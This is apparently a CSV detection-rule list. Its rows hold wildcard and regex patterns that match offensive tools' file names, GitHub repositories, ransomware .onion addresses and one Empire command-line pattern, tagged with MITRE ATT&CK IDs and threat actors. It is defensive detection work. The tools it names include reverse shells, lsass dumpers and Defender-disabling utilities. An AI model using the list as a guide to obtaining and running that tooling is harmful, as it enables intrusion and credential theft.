"*revsocks_linux_arm*",".{0,1000}revsocks_linux_arm.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","#linux","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57277"
"*revsocks_linux_mips*",".{0,1000}revsocks_linux_mips.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","#linux","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57278"
"*revsocks_linux_mipsle*",".{0,1000}revsocks_linux_mipsle.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","#linux","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57279"
"*revsocks_linux_s390x*",".{0,1000}revsocks_linux_s390x.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","#linux","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57280"
"*revsocks_netbsd_386*",".{0,1000}revsocks_netbsd_386.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57281"
"*revsocks_netbsd_amd64*",".{0,1000}revsocks_netbsd_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57282"
"*revsocks_netbsd_arm*",".{0,1000}revsocks_netbsd_arm.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57283"
"*revsocks_openbsd_386*",".{0,1000}revsocks_openbsd_386.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57284"
"*revsocks_openbsd_amd64*",".{0,1000}revsocks_openbsd_amd64.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57285"
"*revsocks_windows_386.exe*",".{0,1000}revsocks_windows_386\.exe.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57286"
"*revsocks_windows_amd64.exe*",".{0,1000}revsocks_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/kost/revsocks","1","1","N/A","N/A","10","10","358","47","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z","57287"
"*revsocksserver.h*",".{0,1000}revsocksserver\.h.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","0","N/A","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","57288"
"*revTCPclient.ps1*",".{0,1000}revTCPclient\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","57289"
"*RevTcpShell.exe*",".{0,1000}RevTcpShell\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","57290"
"*RevWinDefKiller.exe*",".{0,1000}RevWinDefKiller\.exe.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","N/A","10","5","448","67","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z","57291"
"*rgleaktxuey67yrgspmhvtnrqtgogur35lwdrup4d3igtbm3pupc4lyd.onion*",".{0,1000}rgleaktxuey67yrgspmhvtnrqtgogur35lwdrup4d3igtbm3pupc4lyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57293"
"*RhinoSecurityLabs*",".{0,1000}RhinoSecurityLabs.{0,1000}","offensive_tool_keyword","Github  Username","github repo hosting exploitation tools for pentesters","N/A","N/A","N/A","N/A","Exploitation tool","https://github.com/RhinoSecurityLabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","57294"
"*RhinoSecurityLabs/pacu*",".{0,1000}RhinoSecurityLabs\/pacu.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","57295"
"*-Rhost * -Port * -Cmd *cmd /c*",".{0,1000}\-Rhost\s.{0,1000}\s\-Port\s.{0,1000}\s\-Cmd\s.{0,1000}cmd\s\/c.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-Jenkins.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","57296"
"*rhosts_walker_spec.rb*",".{0,1000}rhosts_walker_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57297"
"*RHVtcENyZWRz*",".{0,1000}RHVtcENyZWRz.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57298"
"*RHVtcENyZWRz*",".{0,1000}RHVtcENyZWRz.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57299"
"*rhysidafohrhyy2aszi7bm32tnjat5xri65fopcxkdfxhi4tidsg7cad.onion*",".{0,1000}rhysidafohrhyy2aszi7bm32tnjat5xri65fopcxkdfxhi4tidsg7cad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57300"
"*ricardojoserf/adfsbrute*",".{0,1000}ricardojoserf\/adfsbrute.{0,1000}","offensive_tool_keyword","adfsbrute","test credentials against Active Directory Federation Services (ADFS) allowing password spraying or bruteforce attacks","T1110.003 - T1110.001 - T1110","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ricardojoserf/adfsbrute","1","1","N/A","N/A","8","2","172","33","2021-04-23T16:43:59Z","2020-10-02T16:28:35Z","57301"
"*ricardojoserf/NativeBypassCredGuard*",".{0,1000}ricardojoserf\/NativeBypassCredGuard.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","1","N/A","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","57302"
"*ricardojoserf/NativeDump*",".{0,1000}ricardojoserf\/NativeDump.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","57303"
"*ricardojoserf/TrickDump*",".{0,1000}ricardojoserf\/TrickDump.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","1","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","57304"
"*RiccardoAncarani/BOFs*",".{0,1000}RiccardoAncarani\/BOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","N/A","10","10","118","13","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z","57305"
"*RiccardoAncarani/LiquidSnake*",".{0,1000}RiccardoAncarani\/LiquidSnake.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","N/A","10","10","332","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z","57306"
"*RiccardoAncarani/TaskShell*",".{0,1000}RiccardoAncarani\/TaskShell.{0,1000}","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/TaskShell","1","1","N/A","N/A","10","10","56","9","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z","57307"
"*rid_hijack.py*",".{0,1000}rid_hijack\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","57308"
"*ridbrute_attack*",".{0,1000}ridbrute_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","57309"
"*RIDHIJACK.ps1*",".{0,1000}RIDHIJACK\.ps1.{0,1000}","offensive_tool_keyword","RID-Hijacking","RID Hijacking Proof of Concept script by Kevin Joyce","T1174","TA0003","N/A","N/A","Persistence","https://github.com/STEALTHbits/RIDHijackingProofofConceptKJ","1","1","N/A","N/A","9","1","15","7","2018-10-30T15:00:03Z","2018-10-29T19:52:10Z","57310"
"*ridrelay*",".{0,1000}ridrelay.{0,1000}","offensive_tool_keyword","ridrelay","Quick and easy way to get domain usernames while on an internal network.","T1175 - T1553.002 - T1553.003","TA0003 - TA0008 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/skorov/ridrelay","1","0","N/A","N/A","N/A","4","395","56","2020-05-20T03:35:32Z","2018-04-14T22:10:01Z","57311"
"*Ridter/atexec-pro*",".{0,1000}Ridter\/atexec\-pro.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","1","N/A","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","57312"
"*Ridter/noPac*",".{0,1000}Ridter\/noPac.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","1","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","57313"
"*righteousgambit/quiet-riot*",".{0,1000}righteousgambit\/quiet\-riot.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","57314"
"*RING0_ANONYMOUS_PIPE*",".{0,1000}RING0_ANONYMOUS_PIPE.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","57315"
"*ring04h#s5.go*",".{0,1000}ring04h\#s5\.go.{0,1000}","offensive_tool_keyword","venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","57316"
"*Ring0NamedPipeFilter *",".{0,1000}Ring0NamedPipeFilter\s.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","57317"
"*Ring0NamedPipeFilter.h*",".{0,1000}Ring0NamedPipeFilter\.h.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","57318"
"*Ring3NamedPipeConsumer.exe*",".{0,1000}Ring3NamedPipeConsumer\.exe.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","57319"
"*Ring3NamedPipeMonitor*",".{0,1000}Ring3NamedPipeMonitor.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","57320"
"*Ring3NamedPipeMonitor.dll*",".{0,1000}Ring3NamedPipeMonitor\.dll.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","57321"
"*Ripemd-160.test-vectors.txt*",".{0,1000}Ripemd\-160\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","57322"
"*riskydissonance/SafetyDump*",".{0,1000}riskydissonance\/SafetyDump.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","1","N/A","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","57331"
"*rkervella/CarbonMonoxide*",".{0,1000}rkervella\/CarbonMonoxide.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","57332"
